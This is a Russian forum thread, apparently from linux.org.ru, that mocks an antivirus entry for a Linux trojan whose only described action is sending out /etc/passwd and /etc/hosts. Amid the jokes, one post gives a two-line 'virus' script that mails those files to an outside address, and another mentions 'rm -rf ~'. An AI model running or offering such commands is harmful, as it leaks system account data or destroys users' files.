Trojan-Spy.Linux.Small.a

и что? Уже работает?

кстати, скайп тоже /etc/passwd читал. Только его официально трояном так и не признали.

только что прочитал passwd и hosts. я троян?

Умиляет описанная по ссылке «деструктивная активность»: отсылает содержимое файлов /etc/passwd и /etc/hosts. Дальше можно не читать.

Если кто ниасилил теневые пароли — туда ему и дорога.

>Если кто ниасилил теневые пароли — туда ему и дорога.

а что — еще такие есть?

ыыы. Поделитесь этим чудом, посмотрю, как оно на моём amd64 сработает.

> только что прочитал passwd и hosts. я троян?

Трояном ты станешь после того, как отошлешь passwd и hosts туда же, куда и Trojan-Spy.Linux.Small.a. А если сделаешь rm -rf ~, станешь еще и вирусом.

>А если сделаешь rm -rf ~, станешь еще и вирусом.

нет, ты все еще останешься трояном.

anonymous.Linux.troll.a

[groove@GrooveNote ~]$ stat /var/tmp/.zorg stat: невозможно выполнить stat для `/var/tmp/.zorg': Нет такого файла или каталога [groove@GrooveNote ~]$

Я в безопасности?

$ cat zloi_virus.sh
mail -s 'Hi' blabla@mail.server < /etc/passwd
mail -s 'Hi' blabla@mail.server < /etc/hosts

наслаждайтесь ;)

Спасибо, амиго! (:

rc@sigma ~/$ ./zloi_virus.sh
zsh: Отказано в доступе: ./zloi_virus.sh

)):

Кто-то захотел пополнить свою базу хешей?

http://www.viruslist.com/ru/viruses/encyclopedia?virusid=41251

http://www.viruslist.com/ru/find?words=Linux&search_mode=virus&search...

Это походу работа шомана. Пишешь какое-нибудь говно, компилишь и заносишь в БД по вирусам. Феерия.

Решето!!!

фу, сколько есть вирусов до линух! перейду-ка я на фряху...

> фу, сколько есть вирусов до линух! перейду-ка я на фряху...

да, трупы не болеют

А как же черви?

А черви - признак хорошего здоровья трупа. Это ж элементарная медицина. Азы.

А какие черви имеются ввиду: глисты или опарыши? Если первое, то сомневаюсь, что это хороший признак. Вторые же незаменимы на рыбалке.

>А какие черви имеются ввиду: глисты или опарыши? Если первое, то сомневаюсь, что это хороший признак. Вторые же незаменимы на рыбалке.

Глисты у трупа? O_O

> Произвести полную проверку компьютера Антивирусом Касперского с > обновленными антивирусными базами

omg! Да где же они такую траву берут?? o_O Ну если нас ожидают такие вирусы, то я пожалуй не боюсь.

> Глисты у трупа? O_O

они, типо, уверены в себе

Ух ты! А под слакой работает?! Где исходники скачать, ядро патчить надо?

неужели оно рутовские права само получает?

тьфу, я думал оно /etc/shadow читает...

>тьфу, я думал оно /etc/shadow читает...

Мне вот тоже интересно, какой практический вред может нести чтения /etc/passwd? Ну если только получение списка пользователей кем то левым. Ну уж если это самый страшный троян под линь... Я просто не знаю что сказать.

Более того, чтение /etc/hosts по-видимому для получения внешнего ip, так же обломится в локальных сетях, особенно с dhcp.

>Более того, чтение /etc/hosts по-видимому для получения внешнего ip, так же обломится в локальных сетях, особенно с dhcp.

Ну вообще говоря внешний ип можно узнать и не читая /etc/hosts но это уже детали.

Ну, что, ребята, ставим анивири на линь?

Да нате, не жалко!

$ cat /etc/passwd /etc/hosts
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
avahi:x:102:104:User for Avahi:/var/run/avahi-daemon:/bin/false
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
haldaemon:x:104:106:User for haldaemon:/var/run/hal:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
messagebus:x:100:102:User for D-Bus:/var/run/dbus:/bin/false
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:101:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:103:105:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:105:107:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uuidd:x:101:103:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
user:x:1000:100:user:/home/user:/bin/bash
ftpsecure:x:106:65534:Secure FTP User:/var/lib/empty:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
#
# hosts         This file describes a number of hostname-to-address
#               mappings for the TCP/IP subsystem.  It is mostly
#               used at boot time, when no name servers are running.
#               On small systems, this file can be used instead of a
#               "named" name server.
# Syntax:
#
# IP-Address  Full-Qualified-Hostname  Short-Hostname
#

127.0.0.1       localhost

# special IPv6 addresses
::1             localhost ipv6-localhost ipv6-loopback

fe00::0         ipv6-localnet

ff00::0         ipv6-mcastprefix
ff02::1         ipv6-allnodes
ff02::2         ipv6-allrouters
ff02::3         ipv6-allhosts
127.0.0.2       linux.site linux

> кстати, скайп тоже /etc/passwd читал. Только его официально трояном так и не признали.

$ strace ls -l 2>&1 | grep passwd open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 7

А-а-а-а-а!!

$ strace ping www.ru 2>&1 | grep open.\*hosts
open("/etc/hosts", O_RDONLY|0x80000 /* O_??? */) = 5

Как страшно жить...

Что за ламо ЭТО писало? Два действия, и аж 8 (!) Kb!!!!!!

А где его скачать можно? Дайте ссылку. Или он уже в репах убунты есть?

>Если кто ниасилил теневые пароли — туда ему и дорога.

А в каком дистре они сейчас не по умолчанию?

LFS

Почему линуксоиды так свято верят, что вирусов под линь быть не может? Что, в декстопном софте нет дырок, через которые вирус или троян могут запуститься? Или в ядре мало дырок, через которые можно получить права рута? Или суидных бинарников, в которых часто находят дыры? А если вирус/троян получат рута, то им все эти ваши "монтирование хоум с noexec" будут пофигу..

Да и ответьте честно, много ли юзеров заморачиваются с вынесением хомяка в отдельный раздел, опциями монтирования и прочим?

> Почему линуксоиды так свято верят, что вирусов под линь быть не может?

По определению, тузик. Почитай что такое вирус в вики хотябы.

> Да и ответьте честно, много ли юзеров заморачиваются с вынесением хомяка в отдельный раздел, опциями монтирования и прочим?

Все у кого есть мозги. Тем более ничего сложного в этом нет.

+1 думаю у каждого отписавшегося в этой теме дома на линуксе как минимум пяток вирей просто они об этом незнают, а красноглазый фанатизм не дает увидеть правду

Ну хакни меня, быдло.

>А если вирус/троян получат рута, то им все эти ваши "монтирование хоум с noexec" будут пофигу..

Ну да, осталось еще им AI прикрутить, чтобы в слакопомойке могли разобраться О_о

З.Ы. ленин, залогинься

>Да и ответьте честно, много ли юзеров заморачиваются с вынесением хомяка в отдельный раздел, опциями монтирования и прочим?

Как бы да, а что?

> в ядре мало дырок, через которые можно получить права рута?

Их вообще нет. По крайней мере ты о них не знаешь.

> Или суидных бинарников, в которых часто находят дыры?

То же самое.

> Их вообще нет. По крайней мере ты о них не знаешь.

понимаешь "не знаешь" и "нет" - это разные понятия

Напишешь универсальный _вирус_ под линукс-системы - дам с полки пирожок. Ну или люлей, если проблемы затронут меня. Трояны не принимаются.

>LFS

максимум в редакции васи пупкена. там уже давно теневые пароли.

В рамках профилактики сростания ФГМ подумай над фразой «что знают двое, знают все».

>Их вообще нет. По крайней мере ты о них не знаешь.

http://www.linux.org.ru/view-message.jsp?msgid=2822299

>То же самое.

http://www.linux.org.ru/view-message.jsp?msgid=2858088

Достаточно? :)